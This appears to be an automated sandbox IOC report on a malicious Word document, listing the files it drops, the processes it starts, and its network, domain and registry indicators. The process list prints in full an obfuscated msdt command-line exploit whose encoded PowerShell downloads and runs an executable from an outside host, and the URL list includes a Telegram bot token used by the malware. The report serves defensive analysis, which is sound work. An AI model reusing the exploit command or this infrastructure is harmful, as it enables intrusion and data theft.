IOC Report
Payment copy_2911022.docx.doc

loading gif

Files

File Path
Type
Category
Malicious
Payment copy_2911022.docx.doc
Microsoft Word 2007+
initial sample
malicious
C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\DiagPackage.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
malicious
C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\en-US\DiagPackage.dll.mui
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PROMZwFp385vXrN.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb
Microsoft Access Database
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\059BE406-184C-47DB-8766-13F9D87050E0
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4B13FC8B.tmp
HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\70363510.jpg
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=11, description=OLYMPUS DIGITAL CAMERA , model=SP500UZ, software=Corel Photo Album 6, datetime=2007:10:21 17:05:13], baseline, precision 8, 480x640, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9A742D9E.tmp
HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{1FCF93C7-36B2-4597-9FFA-7A18301AC743}.tmp
Targa image data - Color 32 x 7 x 32 +32 +7 "\007"
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{BE0195EF-DE76-44B4-A06B-70C1544DDB6A}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\PROMZwFp385vXr[1]
HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\RESBBFF.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols, created Tue Dec 20 22:15:19 2022, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RESC7C7.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols, created Tue Dec 20 22:15:22 2022, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RESE5AF.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols, created Tue Dec 20 22:15:30 2022, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP
MSVC .res
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Payment copy_2911022.docx.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 16 21:23:07 2022, mtime=Tue Dec 20 21:14:40 2022, atime=Tue Dec 20 21:14:17 2022, length=110504, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [doc]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\Desktop\~$yment copy_2911022.docx.doc
data
dropped
C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\DiagPackage.diagpkg
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\RS_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\TS_ProgramCompatibilityWizard.ps1
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\VF_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\en-US\CL_LocalizationData.psd1
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\result\results.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{9D741663-0E54-4731-8095-222DB92ACF56}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{FC3E07E1-8ECD-43E4-B52E-9C0E75945771}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\PROMZwFp385vXr[1]
HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E5321AD.tmp
HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DEABB9E.tmp
HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1A7B07.jpg
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=11, description=OLYMPUS DIGITAL CAMERA , model=SP500UZ, software=Corel Photo Album 6, datetime=2007:10:21 17:05:13], baseline, precision 8, 480x640, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2DAED936-6AE5-4EA6-A2A6-98457564935D}.tmp
Targa image data - Color 32 x 7 x 32 +32 +7 "\007"
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D442B920-91E2-4DCA-989E-AADAC9D5BA07}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\{152EB01C-EFF3-4579-AB93-1C52F4EF4381}
data
dropped
C:\Users\user\AppData\Local\Temp\{40442F01-F34C-4BAD-AD83-6BF4748B84A6}
data
dropped
There are 41 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
malicious
C:\Windows\SysWOW64\msdt.exe
C:\Windows\system32\msdt.exe" ms-msdt:/ID pcwdIAGNOstIC /SKIp fOrCe /PaRAm "it_rEBRowSEFoRFIlE=#6Aw IT_LaunchMethod=ContextMenu IT_BrowseForFile=4N0$(iEX($(iex('[SYsTeM.text.EnCoDIng]'+[cHAr]58+[chAR]0x3a+'uTf8.gEtString([SyStEm.CoNVErt]'+[chAR]58+[CHAR]0X3a+'FRoMBAse64sTriNg('+[Char]0X22+'U1RPcC1wUm9jRVNTIC1GT1JDZSAtTkFtZSAnbXNkdCc7JDggPSBBZGQtdFlQZSAtTUVtQkVyZEVGSU5pdGlPTiAnW0RsbEltcG9ydCgiVXJMTW9uLmRsbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgSkcsc3RyaW5nIFVXYSxzdHJpbmcgcFksdWludCBlYyxJbnRQdHIgcnEpOycgLU5BbUUgIlFDIiAtbmFNRVNwYUNFIGd1IC1QYXNzVGhydTsgJDg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHBzOi8vcHpzcmJsb2cuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDEyL1BST01ad0ZwMzg1dlhyTi5leGUiLCIkRW5WOkFQUERBVEFcUFJPTVp3RnAzODV2WHJOLmV4ZSIsMCwwKTtTdGFSVC1zbEVlcCgzKTtJbnZPa0UtSVRlbSAiJGVudjpBUFBEQVRBXFBST01ad0ZwMzg1dlhyTi5leGUiO3N0T3AtUFJPY2VTUyAtZk9SY0UgLW5hbWUgJ3NkaWFnbmhvc3Qn'+[chaR]0x22+'))'))))m3/../../../../../../../../../../../../../../../../.Exe
malicious
C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe
"C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe"
malicious
C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe
{path}
malicious
C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe
"C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe"
malicious
C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBFF.tmp" "c:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC7C7.tmp" "c:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE5AF.tmp" "c:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP"
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://shell.suite.office.com:1443
unknown
http://www.galapagosdesign.com/w=
unknown
https://autodiscover-s.outlook.com/
unknown
http://www.jiyu-kobo.co.jp/j=
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
unknown
https://cdn.entity.
unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
unknown
https://rpsticket.partnerservices.getmicrosoftkey.com
unknown
https://lookup.onenote.com/lookup/geolocation/v1
unknown
http://www.fontbureau.com/designers
unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
unknown
http://www.fontbureau.comalsF
unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
unknown
https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/1673982758%discordapi%yyy
unknown
https://api.aadrm.com/
unknown
http://www.fontbureau.comlicY=
unknown
http://wz5PFqmQeks9Nrk59.com
unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
unknown
https://api.microsoftstream.com/api/
unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
unknown
http://www.fontbureau.com/designers/frere-jones.htmlN
unknown
https://cr.office.com
unknown
http://www.fontbureau.comd$=
unknown
http://www.galapagosdesign.com/DPlease
unknown
http://www.zhongyicts.com.cn
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://res.getmicrosoftkey.com/api/redemptionevents
unknown
http://www.jiyu-kobo.co.jp/Y=
unknown
https://tasks.office.com
unknown
https://officeci.azurewebsites.net/api/
unknown
https://my.microsoftpersonalcontent.com
unknown
https://store.office.cn/addinstemplate
unknown
https://messaging.engagement.office.com/
unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://www.odwebp.svc.ms
unknown
https://api.powerbi.com/v1.0/myorg/groups
unknown
https://web.microsoftstream.com/video/
unknown
https://api.addins.store.officeppe.com/addinstemplate
unknown
https://graph.windows.net
unknown
http://www.carterandcone.coml
unknown
https://consent.config.office.com/consentcheckin/v1.0/consents
unknown
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
unknown
https://ncus.contentsync.
unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
unknown
http://weather.service.msn.com/data.aspx
unknown
http://api.telegram.org
unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
unknown
http://www.tiro.K%
unknown
https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/
unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
unknown
https://pushchannel.1drv.ms
unknown
http://www.galapagosdesign.com/staff/dennis.htm;
unknown
https://wus2.contentsync.
unknown
http://www.founder.com.cn/cn/bThe
unknown
https://clients.config.office.net/user/v1.0/ios
unknown
https://o365auditrealtimeingestion.manage.office.com
unknown
https://outlook.office365.com/api/v1.0/me/Activities
unknown
http://www.fontbureau.comedta
unknown
https://clients.config.office.net/user/v1.0/android/policies
unknown
https://entitlement.diagnostics.office.com
unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
unknown
http://www.fontbureau.com6=
unknown
https://outlook.office.com/
unknown
http://www.carterandcone.com.
unknown
http://www.jiyu-kobo.co.jp/jp/e=
unknown
https://storage.live.com/clientlogs/uploadlocation
unknown
http://www.typography.netD
unknown
http://fontfabrik.com
unknown
https://api.telegram.org4
unknown
http://www.monotype.s
unknown
https://substrate.office.com/search/api/v1/SearchHistory
unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi
unknown
http://www.jiyu-kobo.co.jp/e=
unknown
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
unknown
http://www.fontbureau.comrsiv
unknown
http://www.fonts.com
unknown
http://www.sandoll.co.kr
unknown
https://graph.windows.net/
unknown
https://devnull.onenote.com
unknown
https://messaging.office.com/
unknown
https://api.ipify.org/
64.185.227.156
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
unknown
https://skyapi.live.net/Activity/
unknown
http://www.tiro.comf(
unknown
https://api.cortana.ai
unknown
https://messaging.action.office.com/setcampaignaction
unknown
https://visio.uservoice.com/forums/368202-visio-on-devices
unknown
https://staging.cortana.ai
unknown
https://onedrive.live.com/embed?
unknown
https://augloop.office.com
unknown
http://www.jiyu-kobo.co.jp/jp/
unknown
https://api.diagnosticssdf.office.com/v2/file
unknown
https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
unknown
https://api.diagnostics.office.com
unknown
http://www.fontbureau.com/designers/cabarga.htmlN
unknown
http://www.founder.com.cn/cn
unknown
http://www.jiyu-kobo.co.jp/w=
unknown
https://store.office.de/addinstemplate
unknown
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrA
unknown
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrAx-usc:https://pzsrblog.com/wp-content/up
unknown
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXr
118.27.125.229
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXryX
unknown
There are 94 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
pzsrblog.com
118.27.125.229
malicious
api4.ipify.org
64.185.227.156
api.telegram.org
149.154.167.220
api.ipify.org
unknown

IPs

IP
Domain
Country
Malicious
118.27.125.229
pzsrblog.com
Japan
malicious
192.168.2.1
unknown
unknown
64.185.227.156
api4.ipify.org
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
&<9
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
'<9
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
9
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
RemoteClearDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3
Last
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
/(9
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
FilePath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Properties
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Url
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableIsOwnerRegex
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableSessionAwareHttpClose
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALForExtendedApps
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALSetSilentAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableGuestCredProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableOstringReplace
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://pzsrblog.com/wp-content/uploads/2012/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://pzsrblog.com/wp-content/uploads/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\273C0
273C0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSForms
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSComctlLib
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
1
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
UpdateComplete
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033
Options Version
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Data
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Data
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\2F350
2F350
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
File Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Position
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
VisiFlm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutoGrammar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutosaveInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
PreferredView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
